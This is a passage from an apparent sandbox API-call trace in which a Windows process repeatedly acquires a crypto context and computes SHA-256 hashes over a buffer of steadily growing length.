returned 1 [0183.751] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.751] CryptHashData (hHash=0x3396f5f0, pbData=0x32e8a230, dwDataLen=0x560, dwFlags=0x0) returned 1 [0183.751] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83130 [0183.751] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.751] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.751] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.752] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.752] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x580, dwFlags=0x0) returned 1 [0183.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e832b0 [0183.752] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.752] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.752] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.753] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.753] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0183.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e838b0 [0183.753] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.753] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.753] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.753] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.753] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0183.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83730 [0183.753] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.753] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.753] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.754] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.754] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0183.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83760 [0183.756] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.756] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.756] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.756] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.756] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x600, dwFlags=0x0) returned 1 [0183.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83220 [0183.756] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.757] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.757] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.757] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.757] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x620, dwFlags=0x0) returned 1 [0183.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83250 [0183.758] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.758] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.758] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.758] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.758] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x640, dwFlags=0x0) returned 1 [0183.758] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83460 [0183.758] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.758] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.758] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0183.759] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.759] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x660, dwFlags=0x0) returned 1 [0183.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83310 [0183.759] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.759] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0183.759] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.833] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.833] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x680, dwFlags=0x0) returned 1 [0183.833] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83a00 [0183.833] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.834] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.834] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0183.834] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.834] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83340 [0183.834] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.834] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0183.834] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0183.835] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.835] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83490 [0183.835] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.835] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0183.835] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0183.836] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.836] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e839a0 [0183.836] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.836] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0183.836] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0183.837] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.837] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x700, dwFlags=0x0) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83790 [0183.837] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.837] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0183.837] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.837] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.837] CryptHashData (hHash=0x3396ee80, pbData=0x32e8a230, dwDataLen=0x720, dwFlags=0x0) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e839d0 [0183.837] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.837] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.837] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.838] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.838] CryptHashData (hHash=0x3396f660, pbData=0x32e8a230, dwDataLen=0x740, dwFlags=0x0) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e835e0 [0183.838] CryptDestroyHash (hHash=0x3396f660) returned 1 [0183.838] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.838] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0183.839] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.839] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x760, dwFlags=0x0) returned 1 [0183.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e837f0 [0183.839] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.839] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0183.839] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.839] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.839] CryptHashData (hHash=0x3396f660, pbData=0x32e8a230, dwDataLen=0x780, dwFlags=0x0) returned 1 [0183.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e838e0 [0183.839] CryptDestroyHash (hHash=0x3396f660) returned 1 [0183.839] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.839] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.840] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.840] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0183.840] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83940 [0183.840] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.840] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.840] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.841] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.841] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0183.841] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83970 [0183.841] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.841] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.841] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.841] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.841] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0183.841] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83fa0 [0183.841] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.841] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.841] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.842] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.842] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x800, dwFlags=0x0) returned 1 [0183.842] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e844e0 [0183.842] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.842] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.842] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0183.843] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.843] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x820, dwFlags=0x0) returned 1 [0183.843] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84240 [0183.843] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.843] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0183.843] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0183.843] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.843] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x840, dwFlags=0x0) returned 1 [0183.844] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84540 [0183.844] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.844] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0183.844] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.844] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.844] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x860, dwFlags=0x0) returned 1 [0183.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84480 [0183.845] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.845] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.845] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.845] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.845] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x880, dwFlags=0x0) returned 1 [0183.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83cd0 [0183.845] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.845] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.845] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.846] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.846] CryptHashData (hHash=0x3396f5f0, pbData=0x32e8a230, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0183.846] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83fd0 [0183.846] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.846] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.846] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.847] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.847] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0183.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e843f0 [0183.847] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.847] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.847] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.848] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.848] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0183.848] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84090 [0183.848] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.848] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.848] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.849] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.849] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x900, dwFlags=0x0) returned 1 [0183.849] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84270 [0183.849] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.849] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.849] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0183.849] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.849] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x920, dwFlags=0x0) returned 1 [0183.849] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e843c0 [0183.849] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.849] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0183.849] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.850] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.850] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x940, dwFlags=0x0) returned 1 [0183.850] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e842a0 [0183.850] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.850] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.850] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.850] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.851] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x960, dwFlags=0x0) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84570 [0183.851] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.851] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.851] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.851] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.851] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x980, dwFlags=0x0) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84150 [0183.851] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.851] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.851] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.852] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.852] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0183.852] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83d00 [0183.852] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.852] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.852] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0183.853] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.853] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0183.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e845d0 [0183.853] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.853] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0183.853] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.853] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.853] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0183.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83ac0 [0183.854] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.854] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.854] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.855] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.855] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0183.855] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83d30 [0183.855] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.855] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.855] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.856] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.856] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0183.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84450 [0183.856] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.856] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.856] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.856] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.856] CryptHashData 